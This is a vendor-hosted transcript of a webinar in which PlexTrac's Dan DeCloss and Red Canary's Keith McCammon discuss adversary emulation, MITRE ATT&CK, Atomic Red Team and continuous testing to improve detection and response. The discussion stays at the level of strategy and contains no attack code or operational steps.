Skip to content
NOW AVAILABLE Feature Release! Learn About Our Enhanced Capabilities for Prioritizing Remediation Learn more >>

VIDEO

Empowering Adversary Emulation: Threat intel, tools, and tactics for success

We all know that proactive security based on actual threat intel is the best way to prevent and mitigate attacks; however, connecting the dots from threat intelligence to adversary emulation to detection and remediation is complex. Keith McCammon, co-founder and CSO at Red Canary, talked with PlexTrac’s Dan DeCloss about taking your proactive security efforts full circle. They discuss aggregating and sharing threat intel, getting started with adversary emulation, and finding the right tools and strategies to achieve visibility into your security posture.

Series: Friends Friday (A PlexTrac Series), On-Demand Webinars & Highlights

Category: Thought Leadership

   BACK TO VIDEOS

Transcript

Hey, everybody. Happy Friday. Thank you so much for tuning in to our Friends Friday cast here. We are so grateful that you spent some time with us this morning or afternoon, wherever you’re at, and super excited to have Keith McCammon on the cast today from Red Canary. Keith, why don’t you do a brief intro of yourself because we’re excited to have you.

Absolutely. Thank you, Dan. Yeah. I’m Keith McCammon, one of the co-founders and chief security officer at Red Canary. So, like, long-time cybersecurity wonk, worked on offensive and defensive sides of cybersecurity for some time and always enjoy our chats. So this is, it’s fun to be able to have one of those in this format. Thank you again for having me.

Oh, yeah. Thank you. Thanks for taking some time and spending with us, always. That’s what we’ve really enjoyed about this. This new cast that we’ve been doing is just being able to just chat with really fun and smart people. So, and appreciate you taking some time to do this for us. Today we’re going to be talking kind of about adversary emulation and the goals around an adversary emulation program in tying threat intelligence. And how do you also utilize threat intelligence in an adversary emulation program to improve your detection and response capabilities.

Right. Because, like, obviously Red Canary, is very well known, especially in the MDR space. So you guys, you guys get exposed to a lot of data. So maybe like, tell us a little bit about kind of like, you know, on a daily basis, what kind of information are you guys seeing in the world? And, like, kind of like your, I mean, even in your core service offering, but, like, you know, what, how that plays into, I guess, how plays into the conversation today, for sure.

But, yeah, absolutely. Yeah. And we, and this stuff is all obviously very cyclical, so it’s a fun and easy topic and that we can kind of start anywhere and end anywhere. But for us, well, job one, right, is always — and I think for all cybersecurity practitioners, right — it’s like, figure out, like, figure out how to find an adversary and stop them as quickly as possible. Right. And so in service of that, particularly from an intelligence standpoint, we’re always like everyone keeping an eye on news, open source intelligence, working with partners. So that’s kind of like the, I’d say, like the really kind of like wide aperture and of intake we deal with. And then the most useful thing for us is always going to be like the first-party intelligence that we produce.

Right. You know, we kind of take that wide aperture, try to figure out in the middle of that, like, where do we need to, you know, where do we need to be in order to see adversaries in the first place? Like, just to have visibility into, like, the systems where they’re operating, like, what data sources do we need? And then from there, that’s, like, that’s kind of the bridge between, I’d say, like, you know, traditional threat intelligence, and then, like, that’s how that gets kicked over into threat research, detection, engineering, right? So, like, implementing systems, analytics and ultimately putting those investigative leads in front of people where we can make good decisions. And so from an intelligence standpoint, that’s, we see across devices primarily endpoints like Windows, Mac, Linux, but the cloud control plane identity layer in particular, which has become probably the most important, I’d say, today, and moving forward. And so we see a pretty broad cross-section of those, right? So customers use different technologies usually all in those same kind of domains, right? Like endpoint, identity, cloud, et cetera.

But the cool thing is we get to see that, you know, through the lens of, like, an Okta or an Entra ID or through the lens of a Crowdstrike or a Defender for Endpoint or a Sentinel One. And so, you know, for us, from an intelligence standpoint, just, you know, conversations that we’ve had before, just, you know, how do you take things from, like, as diverse a set as possible and distill that down? To me, that’s like, really where it gets interesting is like a community and industries, like, trying to figure out, you know, we’re all seeing very different things at very different stages.

Like Red Canary will see very early stage activity. That’s kind of where we play and where we really focus intently. If you turn around and look at intelligence that a Mandiant or an incident response firm produces, like, they’re seeing late stage, the intrusion has happened. Like, usually there’s been some consequence and they’re kind of working backwards. And so hopefully that’s helpful framing in terms of the signal we see. But also, I’d say, like, where in that intrusion lifecycle, we kind of live and work.

Yeah, yeah, well, and I think that that’s, I think that’s, that’s why we wanted to kind of chat, because, like, what we’re, you know, like, I would say what is the very traditional approach of utilizing threat intelligence and, like, you know, exposure information in the world is to really help identify, like, hey, do we have these IOCs in our environment, you know, from a hunting perspective, but more traditionally, like, hey, would we be able to detect and respond if something like this got triggered? And I think that’s. That’s the traditional approach, which is, I mean, a very good approach for, like, using threat intelligence. And I think what we’re seeing is, like, hey, you know, let’s. You know, when we talk about the conversation of, like, moving from the reactive to the proactive, that’s where it’s, like, you can still utilize that threat intelligence, and that’s kind of where the notion of adversary emulation comes into play, right?

Yep. Yeah, absolutely. Looking at, like, Atomic Red Team and things like that. Right. Which is, like, much more granular, but I’d say, like, a ton of the value there is in trying to figure out, hey, like, you know, when you see a real-world incident, how do you kind of abstract, like, that sequence of events and those things? And you can test them very individually, which I think is, that was kind of the spirit of Atomic where that started. But I think, yeah, like, so much of the promise there is in figuring out how do you chain these things together in a way that, like, really makes it easy to understand in a very, very practical way. Like, this adversary will do these things, roughly speaking, like, in this sequence. And. And, yeah, being able to, like, being able to just, I’d say, like, make that, like, make that type of intelligence more accessible, I think, is, like, that’s, like, game-changing for when and when and where we can do it. That just, like, that eliminates so many barriers because it is a little, you know, for a long time, I feel like it was a really small kind of cross-section of the industry that even had that information to begin with. And now it’s like, anybody can have what we have, which is great.

Well, no, and I think that’s a testament to the evolution of our field, too. Right? Cause, like, yeah, like, for the longest time, we didn’t have resources to really know, like, hey, how, how do I know how these advanced threat actors are behaving and what are the procedures that they’re using to get into our, you know, into the. Into the bigger environments or whatnot? And so now we have. We have that, you know, we’ve got MITRE ATT&CK, which I think is, you know, really exploded, which is great. I’m a huge fan of it, and I know you guys are, too.

And then, and then something like Atomic Red Team, where you’ve got the resources to actually be able to say, like, hey, I can take this and actually go test for it without needing any kind of automation. Like, you know, I mean, I genuinely can sit hands on keyboard and emulate some of these activities that threat actors are providing. What do you think was the difference, you know, this from the threat intelligence side of like being able to aggregate more together and share it differently? Like is it just, has it just kind of been more organic or was there, do you think there was something like different there?

I would say honestly, the single biggest catalyst probably was and still is ATT&CK because I think it, you know, prior to that, again, there are a small number of shops producing, doing kind of like rigorous threat intelligence, like research and reporting. But by and large, everyone had their own language and their own taxonomy. And it was great that that stuff was being published. But the barrier of entry for putting together a program that’s capable of doing that is like super high, right? And so I think that was absolutely the single biggest catalyst was just having like that common language, but also like that, you know, that taxonomy and that structure. And as that’s evolved over the years, I think it’s just continued to make it easier and easier. I don’t, prior to that, it’s, you had your ISACs and places like that and you had a mix of kind of the commercial and open source like intelligence platforms. But as it those, it was great and it worked. But again, it just worked for such a small cross-section of the industry and like everyone else was left behind. There was just, there was no hope, right? If you’re a small shop, you’re not, you’re not setting up a MISP instance and federating with an ISAC and doing all these crazy things and you’re sure as heck not like figuring out how to extract from that like a really easy to understand, usable adversary emulation plan. Like that was, that was just so far beyond anyone’s reach that like, I think like the advent of ATT&CK and everyone kind of having that, you know, is like an interchange format that’s been game-changing.

I agree, I agree. Like, I mean, and that’s what I’ve always loved about it too is like, you know, from the pentester side of the house, right? You know, this is how we’ve always tried to like speak to customers or, you know, our industry or, you know, enterprises or whomever in that. Like, hey, like, you know, while we have a lot of other things that we should be focused on from the security program and compliance and risk and governance and all this, but at the end of the day, you know, we are in the mission of trying to identify like where we’re most vulnerable, how an attacker is going to breach our environment and what, you know, what their techniques will be for like extracting information out or the crown, you know, whatever the mission or objective may be. But so it brings that normalized nomenclature of like hey, these are the, these are the general steps that an attacker is going to, gonna, going to be taking. Right? You know, renaissance, you know, lateral movement, you know, code execution. I think that’s, that’s been, that’s been, I mean, I think very influential, you know, from the pentester side of the house because that’s, yeah, that’s how, this is how we’re trying to, trying to, you know, emulate environment attacks in people’s environments.

Yeah, I’m not sure it’d be interesting to get your take on this having done, you did it before and you’re doing it now and you’ve kind of seen that whole arc. But for one of the things that we encourage, and I’d say the mantra and the spirit, I guess, of Atomic Red Team in general, not just the open source project, is that the best test is the one that you can do every single day, like, and it’s honestly just like establishing that drumbeat. We kind of like, liken it to like health, healthcare rights, like take your vitamins, do this as often as possible. It doesn’t have to be big, it doesn’t have to be really complex.

And I’d say, you know, from, from a provider standpoint, like our customers are, you know, some, a small number of them have a red team. Most of them that do any testing, hire someone. And I think back like 8-10 years, the most common practice was that you got as a customer or as an organization, you were exposed to as much testing as you could afford from a consulting standpoint. And so it was good that they did a red team or a pentest once a year. It’s better than not doing it at all. But the problem was that that would happen and then ten or eleven months would go by and nothing would happen. And when you take your report and you’ve got your leave behind when you finish an engagement with someone, and I’d say maybe the most game-changing thing from an organizational standpoint is having ATT&CK and just whether it’s Atomic Red Team or not, just so much of this tradecraft being exposed, making it easier to find because you can search for like a fairly specific like technique or stage of an intrusion. And now what we see is like someone hires a firm. They come in, they do the test, but, like, now that leave behind is, like, orders of magnitude more useful. And, like, that customer can now turn around and 30 days later, they can go step through, like, all the tools, all the tradecraft, all of, like, the tests and procedures. Like, it’s all right there. And so 30 days later, they can make some improvements and they can literally go and, like, effectively, like, redo.
Like, they can. They can reproduce your work. And, like, that is, like, that alone is, like, game-changing. Right? It’s like you’re no longer, you know, the testing you can do is no longer a function of just, like, dollars you can throw at a third party. And, like, that’s. Even if you don’t have a big, super-experienced internal team, like, that barrier has just come way down.

Oh, 100%. Yeah. No, I mean, that’s what we’ve kind of been preaching. We’ve been preaching for a long time is like, one being able to move from a reactive state to a proactive state and then shortening the cycle on how quickly you can identify what you should be testing and testing for it on a regular basis. Right? Yeah. It is that daily hygiene, kind of apple-a-day type of a thing. And that’s what I’ve loved about ATT&CK and even Atomic Red Team is that it does, it provides those. You can go as broad and wide and deep as you want or as narrow as you need to, and you don’t have to have 100% of the skill sets as a seasoned, veteran red team or pen testing team to be able to at least identify some of the things that you probably know you should be fixing.

Right? So, like, and I have a prime example of this. When I was a security director, before we started PlexTrac, we did. It’s very similar. We kind of went into this mindset of, like, being in an agile framework. And so, hey, we’re going to. We, you know, we want to do some testing on a regular basis because, like, this was still, like, what I knew we should be doing, right? So I’m like, hey, how can we get kind of into this mindset? So every two weeks, we were. We were focused on. On a general tactic, like, okay, within. Within lateral movement. Like, we feel like one. We kind of knew our environment well. So it’s like, hey, we have a general idea, you know, of where our gut feels where we might have some weaknesses, right? So we started with lateral movement, right? And it’s like, hey, let’s just test. Let’s do as much of lateral movement testing as we can in this two-week sprint and, and then see where we’re at.

You know, and then, and so it’s so much more informative because then it’s like, okay, yeah, hey, we actually identified some gaps and we’ll go fix those now. And so rather than, like, waiting an entire year, especially between, like, you know, if you have a yearly pentest, still good, still good to do to get fresh eyes on things, but, like, the techniques and procedures that, that change between, you know, one year to the next can be so drastic. You’re not, you’re not truly preparing yourselves.

Right. Yeah, but I’d say there’s like a, there’s also, like, there’s like a counterpoint to that, too, which is that for every one of those things that does change, I’d say there’s also a lot that doesn’t. And I think, you know, that, that point like, that you make, which is, you know, take, it’s kind of like this picture that I always draw when I do these talks, but it’s like, you know, take a big thing, you’re worried about, like a ransomware or an account compromise, and then for us, we break that down into threats, right? Which is kind of like, you know, that’s the next level. And so a threat might be a tool like a cobalt strike or something like that, or a threat might be a group or an adversary, right, if they have a name. But then what we always, like, what we’re always looking for in our own reporting and everyone else’s is like, then breaking that down and just going, hey, from the earliest sign that, like, this, like, this threat has materialized in your environment, like, what are the first behaviors, signals you’re going to see?

And, like, I love the idea of just like, you box that in and say, hey, like, we’re working right here. Like, earliest stage sign that we’ve got this thing showing up, let’s just spend a week on it.
And that’s very, like, that’s always going to be an interesting mix. Like, those techniques don’t really drift much year over year. We’ve talked a ton about this, right? Like, those top 10-15 techniques that we see show up, like, day after day after day. Like those things are. There’s not a ton of drift there. Even when you look back three, four, five years. The procedure, like, the implementations change, often slightly, sometimes significantly, sometimes slightly, and that’s where all the variability takes. But if you do, like, if you kind of, like, if you can take that and just box it in and say, hey, cool, we’re working on, you know, very early stage initial access.
Here’s the threat, here are the techniques and that makes that super approachable, man. And like you just step through and when you get to the end, sure, just like start back at the beginning, things will have changed.

And that’s where the threat intelligence actually comes really handy from the proactive side is like, hey, not only like this procedure has changed, right? Like it’s the same general tactic of Privasc in same general technique of like using Powershell or something like that, but the actual command or the prompt or like the vector may be slightly different. And that’s where threat intelligence can actually inform you to say like, hey, we’ve been testing for this. Just throw this one now into the mix. Right?

Yeah. And I think one of the things that’s always excited me about, you know, what you all have done from a product standpoint even is just the systems approach to doing that. And just you do your test, you have your findings, and then most importantly you have the things that you need to change. And what’s really interesting, I’d say the organizations that do that, they’re taking their vitamins, doing testing regularly. You know, whenever we, every year when we put out our touch detection report, like the single biggest observation is like, hey, there are some new things in here. But like, keep an eye on what didn’t change. And if you’re doing that testing and then saying, hey, cool, like, we’ve got a visibility gap here, like there’s a whole, like, there’s a set of signal we need that we’re not getting and like taking that finding and peeling it out and making sure that like, that’s the thing that you focus on. Once you do that, it’s amazing. Your defensibility forever is leveled up incredibly. And just taking that approach of really breaking down time box or isolate your tests, focus at a particular area, but then really take a rigorous approach to root cause analysis. Why did we not see this thing? Or how could we have seen it sooner? How could we have like shortened our time to respond to that? And even if you’re just doing that like once, just that level of like rigor and just like good incident management, honestly, right. Just like seeing an incident through, but like really focusing on like visibility gaps, vulnerabilities — whether it’s software configuration, human. Right.

And once you’ve closed those, like, I think it’s what’s really interesting and I think most organizations, like most organizations still aren’t to the point where they’re doing that. But, like, once you do that and, like, that flywheel starts to engage, like, you’re closing, like, really small gaps from that point forward. It doesn’t take very many of those findings to, like, to really, like, you’ve made it so much more difficult for, like, any adversary to operate. Like, not just that threat, but, like, most threats are going to use a common set of initial access techniques, right. No matter. No matter who they are or what they are. And as you start to close those gaps and, like, build some rigor in there, you just find that over time, like, you have, like, really built something that’s, like, pretty difficult to evade. Yeah. Like, that’s it. There’s just a ton of promise there. And I just, like, if anything, it’s like, how. How do we get more people to do that, even if they only do it? Maybe not every week, but, like, even if you do that once a month, like, you, like, your ability to, like, defend against, like, even a sufficiently advanced adversary is just, like, it’s game-changing forever.

You know, I’d be curious your thought, you know? Cause, like, you know, I’d say, like, on the detection and response, you know, there’s a lot of time spent into, like, how would we detect if this thing happened in our environment? And what would our empty mean-time-to-response or, you know, remediation be? I’d be curious, like, you know, tying that back into the proactive side, because I’d be curious your thoughts and, like, advice on. On how you can do that. And I have some thoughts of my own, but I’d love yours.

Yeah, well, I mean, the. Just. I’m not 100% certain I kind of understand the question there, but, like, I think, you know, from. I guess. ‘

Yeah, I guess what I was saying is, like, you know, we spend a lot of time, like, security teams spend a lot of time on the detection engineering piece, right? Like, kind of configuring those iocs to, like, hey, if. If this happens, we know we’ll get an alert. Right. And, like, what would be your advice of, like, you know, spending as much time on the proactive side as we do on the detection and response side?

I got it. Yeah, this is, first of all, I’d say taking an engineering-driven approach to that is absolutely the right way. Right. That’s how you do, like, just ensure continuous improvement. But also, to your point about how do you kind of balance the proactive and the reactive, right? I mean, I’d say one of the things that we’ve always felt super strongly about is we spend, I’d say, as I would hypothesize, that our team detection engineering team spends easily as much time on testing and writing tests as we write analytics and then just continuing to, like, pressure test in those areas where we do expect that, like, adversaries are just going to continue to, like, incrementally, like, innovate or, you know, just like, evolve within, within a technique space.
I mean, 50-50, I think is actually like a great and very realistic rule, right?

I think there is, you know, wherever, I think for a long time, the mindset was like, just keep cranking out more analytics, keep tuning them, and that’s super dangerous, right? And a bunch of ways, like, one of our kind of, like, deeply held beliefs is like, we actually want our analytics to be fairly broad. Like, we’re fine with false positives or, you know, and then we just, you build a workflow and a system that makes it easy for an analyst to make a decision and say, hey, this is okay because, and I, you codify that and that goes back and feeds into the machine. But you don’t want to spend all your time just writing more analytics and trying to tune those things to the point that they’re surgically accurate. Because by definition, like, if you’ve got an analytic that’s that surgically accurate. Like, it doesn’t take much of a change for that thing to fail. And so just start to just, yeah, you may never see it again.

And so taking that approach where it is like, yeah, cool, get a beat on the adversary, ensure you’ve got good visibility. Build your detection at a technique level that’s practical given like, your platform and your constraints. But then most of your time shifts immediately into that proactive stance where, let’s write tests for this thing. Let’s start thinking about where are the permutations going to be, where are the changes? Like, if you’re looking at Powershell command lines, like, there is, you know, there’s a whole world, like, that’s effectively like its own, like, complete language. You can, you can do all these different things and you can, there’s a thousand ways to do any one thing. And so you almost have to, like, once you get a bead on a technique, particularly one that, you know is going to be like, highly prevalent, spend almost as little time as possible writing analytics and trying to select out data, and spend as much time as possible focusing on being proactive. Testing both from a software detection engineering standpoint, make sure you’ve got regression tests built in. Make sure you’ve got unit tests built if you’re doing that at scale, but also just the very applied testing. Right? Like go and. Go and run these things. Read new intelligence. Like throw as many things like, into that system, like fire as many tracers as you can and make sure that when. That it’s going to work when it matters. Right. And that’s kind of thing.

Yeah, yeah, exactly. And that. And that’s my opinion, too. I mean, you know, as spending as much time on the detection response, you know, you know, capabilities for alerting should also be spent on, hey, actually identifying if you have the gaps. Right. And what the variance can be, as you said, in terms of like, hey, they may be running this command if our detection signature or whatever, like, you know, carbon black or in whatever system is saying like, hey, this is the way that it’s going to be run. If we tweak it at all or like change the encoding on the payload, does it still fire? Right.

So it’s like, you can still be, I think I would say. I would suspect that there’s a lot of testing being done around the alert of firing as opposed to, like, that’s great. I mean, you still want to know if the alert fires, but also, like, are you actually testing for the gaps that you have in the environment? Right.

The key to incident response is knowing you have an incident in the first place. Right. Like, it is really easy to fixate on, like, the more mechanical stuff. And, like, you kind of lose sight of the fact that, like, hey, like, what if. What if we did? Like, you might have a perfect analytic and you might feel really good about your detection, in this area, but, like a whole. So that fundamental, like, red team philosophy, which extends very much into like, purple teaming now, which is great. Like, that more collaborative version of it is like really pressure testing that hypothesis. All right, cool. So we feel great about this super early-stage signal and our detection, and we know what to do. Like, now let’s play it out. Like, let’s pretend they find another way in entirely. Like, what’s the next thing they’re going to do? And do we feel as good about that as we feel about thing B is thing A?

And that only comes through just constant experimentation and being super proactive and really a mindset that’s very focused on just assuming that any one of those stages, processes, opportunities, assume any one of them will fail and make sure the whole system works. And that’s kind of, I think, like the, that right there is like the difference between, like, doing atomic testing and doing detection engineering at a granular level, which is important, but, like, adversary emulation. And the importance of it is that, like, that just plays out the whole attack from start to finish with as much variability as you can afford to introduce over time and make sure, like, if the whole system doesn’t work, none of the system works. And so, like, you gotta, you gotta make sure that if you miss a thing here, that, like, you feel good about your opportunity to pick it up at the next stage.

Yeah, well, and I think. I think just even having some level of comfort or not in terms of, like, hey, we’re. Here’s how we’re making progress, right? Like, hey, last year we were, we were not, you know, anywhere close to being able to detect anything related to privilege escalation. Now we can detect it. Maybe next year we could actually prevent it, you know, or, you know, and so being able to test it on a regular basis is, is that iterative process as well from both the defensive side or the, you know, the reactive side and the proactive side.

So, yeah, yeah, that is. We haven’t really talked about that at all, but it is, you know, moving upstream. Like, the always refer to, you know, detection is critical. Like, if you can only do one security operations thing really well, like, it’s got to be detect and respond. Right? And then you kind of, like, you evolve out from that. It’s like, concentric circles, kind of, but that is, you know, like, glad you called that out because the, you know, the ideal situation is, like, you learn enough about that attack surface that you figure out how to mitigate it, and you take it away. Right? And it’s like, Casey Smith and I did a, did a fun talk years ago, and we just kind of talked about the concept of, like, battlefield shaping. Like, the real goal in all of this is not to get great at diving saves. We built a ton of detection coverage at Red Canary. That is our bread and butter. Be better at detecting things that everything else has missed, and that’s where we operate. But those are diving saves. Every single one of those is a miss away from an adversary making it one step further. And now, like, every step further, every, every step that they progress, like, stakes are higher, you’re working harder to find them, scope that intrusion, mitigate it. And really what we want, it’s like when you talk, like, adversary emulation and just, like, systematizing that that’s the Holy Grail, is like, move that upstream and get to the point where you’re taking as much attack surface away as possible, force the adversary, like, into these choke points that you can defend really well, understand really well. Like, you can, like, you know how to respond, and you can really operate almost with a hair trigger when things go, like, things go kind of go bump and, like, that concept of battlefield shaping where it’s like, just steer the adversary into the small number of places that you can just watch like a hawk and, like, you know them better. You understand what normal looks like. And when things go sideways, like, you can just respond with a ton of confidence.

And, like, that’s like, once you’re at that point, you’re really, like, now you’re doing some really cool stuff, like doing detection on the margins. You can really innovate from a detection standpoint just because, like, you’ve taken away so many of those options and, like, that adversary’s ability to maneuver. Yeah, yeah.

I mean, obviously, we’ve already gone like half an hour, just like, you know, like, I think we knew we could talk a lot about this kind of stuff because I think we’re both very obviously super passionate about it. So. But, yeah, so, I mean, like, you know, kind of land the plane. Like, you know, what would be some of your advice to folks to, like, hey, how do you get started? Or what’s the best way to start gaining more visibility and taking some threat intelligence into a proactive state? Like, what would be your.

From a productivity standpoint, I think, and, you know, I think how this conversation came about was us trying to figure out, hey, how do we, like, how do we aggregate, normalize, share more intelligence across the whole industry and then get it into the platforms that folks are using to, like, prioritize their work, to do purple teaming, and to, like, again, like, systematize their security operations.

And I think the proactivity in general, it’s the number one thing I always recommend is just, there’s great sources of free intelligence. Take even a few of those and just figure out, you can make a really short list. The number of initial access vectors have not changed much in five or ten years. They trade places, with the exception of the SolarWinds year where you had the big supply chain blip, it’s phishing, it’s vulnerabilities. Like, figure out how folks are getting a foothold in the first place. Instrument as much visibility as you can there, and then take all of this great open source intelligence that’s available, figure out again those small number of techniques in each of those areas, to your point, just box them in don’t worry about all the other things that could happen and all the other. There will always be more ways, but I think just very granularly stepping through that. Like, how are they getting in in the first place? Are we instrumented there? Do we have visibility? And then what are the most prevalent techniques? Again, not a ton of drift there year over, year over year.

And just, like, just keep that flywheel moving. And, like, every single time you as a purple team, like, you find a gap or you find a failure mode, like, fix that and feel like everyone, like, none of us appreciate fully. I don’t like. Or not many folks appreciate fully, like, the massive gains you make and just, like, how much you increase the cost to the adversary and kind of just introduce friction in their process and make your organization so much more defensible. Like, those are just, like, the benefits are so additive over time that you’re in a terrific position, but it is just, like one thing at a time and, like, ruthlessly prioritize for what’s common. Do not worry. Like, there will always be o days, there will always be apex adversaries. Like, there will be the stuxnets of the world and things like that. But, like, that is not what 99.99% of us need to show up at work every day and, like, worry about an instrument for and find and respond to.

So. Yeah, and I think, like, I I think, like, my advice also, you know, when people ask is like, hey, don’t feel overwhelmed, too. It’s like, like you said, starting somewhere and doing something every day is better than nothing. Right? And kind of similar to, like, you know, the way you lose 20 pounds is you just start, you start on day one. You just can’t take a day at a time. It doesn’t happen overnight.

Right? Yeah, get up and take a walk, man. That’s every single day.

Eat a little less. Something like that. So. Well, hey, Keith, so much. Thanks so much for spending some time with us today. Super, super engaging conversation. Tell us a little bit more about, I know what you’re working on, but tell us for the audience and how people could find you and whatever else.

Yeah, yeah. We’re still working on Red Canary. Going strong. I will say it’s to the point of what I’ve been working on and I think, and I hope where, like, a lot of this dialogue leads is just, like, always working on ways to figure out, like, how can we, how can we learn from our peers and others in industry and, like, how can we, you know, what do we know? Things that we’re finding seeing, doing the hard way. Like, can we short-circuit that learning process or help other people get the benefits of that? And so, so much of, like, you know, what I enjoy working on and we’ve been working on is just trying to figure out, like, how do we, how do we get more kind of data, insights, intelligence flowing freely, not just from Red Canary to the public, but others like yourselves, and continue to lower the barrier of entry, product integration, community building, threat intelligence, being able to share that stuff and make it super actionable. So we’re spending a lot of our time right now.

Awesome. Awesome. Well, yeah, thanks so much again. Definitely appreciate the great conversation. Definitely. Check out Keith on LinkedIn. Same with Red Canary. They’re great, great group of folks. We love working with them and obviously love working with you, Keith. So thanks again.

Happy Friday, everybody. We wish you the best and hopefully you guys all have a great weekend and hopefully you learned something. If you have any questions or comments, feel free to leave them in the chat and we will try to respond as soon as we can. Awesome. Yeah. Thanks for having me, Dan. Really appreciate it, man. This was super fun format and conversation.

Yeah.

Have a great weekend. Thanks. You, too. Cheers.